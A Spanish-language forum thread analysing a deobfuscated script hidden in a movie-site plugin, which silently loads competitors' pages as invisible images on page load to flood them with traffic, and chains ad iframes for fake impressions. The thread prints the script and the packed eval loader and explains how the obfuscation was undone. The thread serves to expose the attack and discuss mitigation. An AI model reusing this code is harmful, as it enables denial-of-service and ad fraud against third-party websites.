Las webs que peliculas-flv[DOT]com hace DDOS

  • Autor Autor Cicklow
  • Fecha de inicio Fecha de inicio
Cicklow

Cicklow

Admin
Épsilon
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
¡Usuario popular!
Suscripción a IA
Bueno dsp de desencripar el codigo del plugin tenemos esto:
Insertar CODE, HTML o PHP: 
var links=Array(
/*
"http://sibsoft.net/",
"http://xvideosharing.com/",
"http://xfilesharing.com/",
"http://xfilemirror.com/",
"http://www.sibsoft.net/cgi-bin/communimail/mailadmin.cgi",
"http://sibsoft.net/forum/",
*/
"http://www.cinetux.org/iframes/03.php",
"http://www2.cinetux.org/",
"http://www.cinetux.org/",
"http://www.miracine.com/",
"http://www.tucinecom.com/",
"http://www.tucinecom.com/category/subtitulada/",
"http://www.cinetux.org/tematica/sin-categoria",
"http://www.puertocine.com/",
"http://www.miracine.com/series/",
"http://www.miracine.com/series/true-blood-temporada-5.html",
"http://www.cineid.net/reproductor/pelicula/774/28/",
"http://www.cineid.net/peliculas/genero/romance",
"http://elnotito.bligoo.com/media/users/21/1050556/files/264713/ads.php",
"http://elnotito.bligoo.com/media/users/21/1050556/files/264713/prueva.php",
"http://elnotito.bligoo.com/media/users/21/1050556/files/264713/index.html",
"http://elnotito.bligoo.com/media/users/21/1050556/files/264713/facebook.php",
"http://peliculas-hd.org/peliculas/mas-vistas/",
"http://peliculas-hd.org/peliculas/random/",
"http://peliculas-hd.org/peliculas/ver-miss-bala-online.html",
"http://alpendiente.com/sitemap"
);
//###{encode}


function createimg(i,link)
	{
	var sx=document.createElement('img');
	sx.setAttribute("id","imgmuerte"+i);
	sx.setAttribute("src",link);
	sx.setAttribute("width",'0');
	sx.setAttribute("height",'0');
	document.getElementsByTagName("body")[0].appendChild(sx)
}


//###{encode}


function stopimg()
	{
	for(var i=0; i<window.links.length;	i++)
		{
		document.getElementById("imgmuerte"+i+"").remove()
	}
	clearInterval(inte)
}


//###{encode}


function getreproes()
	{
	for(var i=0; i<window.links.length;	i++)
		{
		createimg(i,window.links[i])
	}
	var inte=setInterval("stopimg()",6000)
}



//###{encode}


if(document.loaded)
	{
	getreproes()
}
else
	{
	if(window.addEventListener)
		{
		window.addEventListener('load',getreproes,false)
	}
	else
		{
		window.attachEvent('onload',getreproes)
	}
}

//###{encode}

if(window.top==window.self){
    var s = document.createElement('img');
    s.setAttribute("width", "0");
    s.setAttribute("height", "0");
    s.setAttribute("style", "display:none;");
    s.setAttribute("src", "http://whos.amung.us/cwidget/wdplugin/ffffff000000/");
    document.getElementsByTagName("body")[0].appendChild(s);
}

Saludos! como ven las url que aparecen arriba son las que peli... esta volteando!
 
wouh! :encouragement: como has logrado desencriptarlo?
 
esa son la que mas visita tienen mira vos queria bajar toda y llevarsela el la visita
 
Tambien carga sponsor de impresiones. muchos banners, un iframe que carga un banner y otra url, y esa url otro banner y otra url y asi.... y continua... cargando muchas impresiones...

Es como si ganara $$ con el RPM de adsense (pero sin adsense)

Cargan esta url:
Insertar CODE, HTML o PHP: 
http://darkcine.com/mil.html
y esa carga y carga iframes, dentro de otros iframes y bla bla bla...
 
Última edición:
wuao amig... como lograste desencriptarlo?
yo intente una y otra y otra vez y nada :/
 
leo1321 dijo:
y se puede hacer algo al respecto?
Hacer clic para expandir...

Creo que el compañero wsoul estaba comentando sobre eso y quería ayudar en un tópic anterior, espero se llegue a una solución con el tema.
 
para bloquear el ataque?... pues adaptar el hosting para que soporte los ataques. Otra no queda. O denunciar al hosting de pelisflv y que el hosting los bloquee o elimine.
Yo hoy estuve ayudando a los de miracine.com y conjuntamente con el soporte de mi hosting (banahosting) llegamos a una solucion y fue instalar un soft para prevenir el 90% de el DDOS o mudarse a un server de bana con el soft anti DDOS. Decidieron mudarse a bana para solucionar todo esto.
 
Última edición:
Por favor, si pueden compartan el siguiente enlace 🙂
Enlace eliminado
 
[MENTION=1978]thejigg0695[/MENTION] , [MENTION=16282]suenajoven[/MENTION]
Hay varias opciones asique les comentare sobre ellas.
1- Desencriptando
-- use Enlace eliminado para ver mejor el codigo de home.php
-- luego aprendi como funcionaba el codigo fuente ese, y vi que usa base64 y luego caracteres numericos (que son codigos ascii)
-- fui viendo con alert que hacia cada parte del codigo y vi que se creaba una variable de nombre a (siendo esta un array) y se iba guardando los codigos ascii en ese array.
-- Al final la ultima funcion encriptada lo que hace es pasar ese codigo ascii a codigo normal.
Este codigo:
HTML: 
eval(function (p, a, c, k, e, d) {
    e = function (c) {
        return c
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[c] = k[c] || c
        }
        k = [function (e) {
            return d[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('7(8 5 21 6){4="";7(8 3=0;3<6[5].11;3+=2)4+=12.10(13(6[5].9(3,2),16));14(4)}1 6;1 20;1 4;1 19;1 18;1 15;1 17;1 5;', 10, 22, (e.Ch('fGRlbGV0ZXx8aXxifHF8YXxmb3J8dmFyfHN1YnN0cnxmcm9tQ2hhckNvZGV8bGVuZ3RofFN0cmluZ3xwYXJzZUludHxldmFsfHl8fG98c3xyfGV8aW4=')).split('|'), 0, {}));

Pasa a ser:
HTML: 
for (var q in a) {
    b = "";
    for (var i = 0; i < a[q].length; i += 2) b += String.fromCharCode(parseInt(a[q].substr(i, 2), 16));
    eval(b);
}
delete a;
delete e;
delete b;
delete r;
delete s;
delete y;
delete o;
delete q;
Editando esa funcion pase a ver que hacia el eval:
HTML: 
var xxx = "";
for (var q in a) {
    b = "";
    for (var i = 0; i < a[q].length; i += 2) b += String.fromCharCode(parseInt(a[q].substr(i, 2), 16));
    xxx += "<br/>" + b;
}
delete a;
delete e;
delete b;
delete r;
delete s;
delete y;
delete o;
delete q;
document.write(xxx);
De esta forma vi otro codigo (encriptado) que era el ultimo codigo, lo que hacia era cargar
Insertar CODE, HTML o PHP: 
http://darkcine.com/apps/948687/walking_dead.js
http://ad.adserverplus.com/st?ad_type=iframe&ad_size=300x250&section=3048190&sv=4647848584844
http://habboin.com/160x600.html?sv=4647848584844
http://habboin.com/120x600.html?sv=4647848584844
http://ad.adserverplus.com/st?ad_type=iframe&ad_size=728x90&section=3048190&sv=4647848584844
http://habboin.com/468x60.html?sv=4647848584844
http://habboin.com/300x250.html?sv=4647848584844
http://habboin.com/sin.html?sv=4647848584844
http://habboin.com/sin.html?sv=4647848584844
http://habboin.com/800x400.html?sv=4647848584844
http://darkcine.com/apps/948687/
http://darkcine.com/ads/filesline-popup.html?sv=4647848584844
http://ad.adserverplus.com/st?ad_type=iframe&ad_size=800x440&section=3048190&sv=4647848584844

Es muy facil si cambiamos los eval(... por document.write o alert... 😉

2- usamos el complemento: inspeccionar elemento con firebug, al hacer esto vemos que el codigo fuente cambia, y nos muestra que esta cargando Enlace eliminado y este codigo es el encargado de hacer ddos a las webs.

3- usando un proxy como charles, al hacer esto vi que archivo externos cargaba el home.php 😉
 
ya con los plugins de monsterdivx y de moviezet que cambian la publicidad era un abuso, pero esto ya es vergonzoso
 
NonTan dijo:
ya con los plugins de monsterdivx y de moviezet que cambian la publicidad era un abuso, pero esto ya es vergonzoso
Hacer clic para expandir...

Lógico que si. En verdad es algo muy desleal.
 
Conosco al dueño de CineTux y en verdad esto lo afecta mucho, en verdad es vergonzoso lo que este tipo por ambicioso realiza, ojala tomen cartas en el asunto porque esto no debe quedarse asi
 
A mi cinetux me redirige a Peliculas FLV otra trampa de pelis FLV :ambivalence: o quizas se unieron :s
 
:$ , ¿Te atacan con DDOS que mal? , que lastima que algunas personas se valgan de cosas tan bajas , total en el internet hay lugar para todos 🙂 es lo bueno XD
 
Hay que estar conectado o registrado para responder aquí.
Atrás
Arriba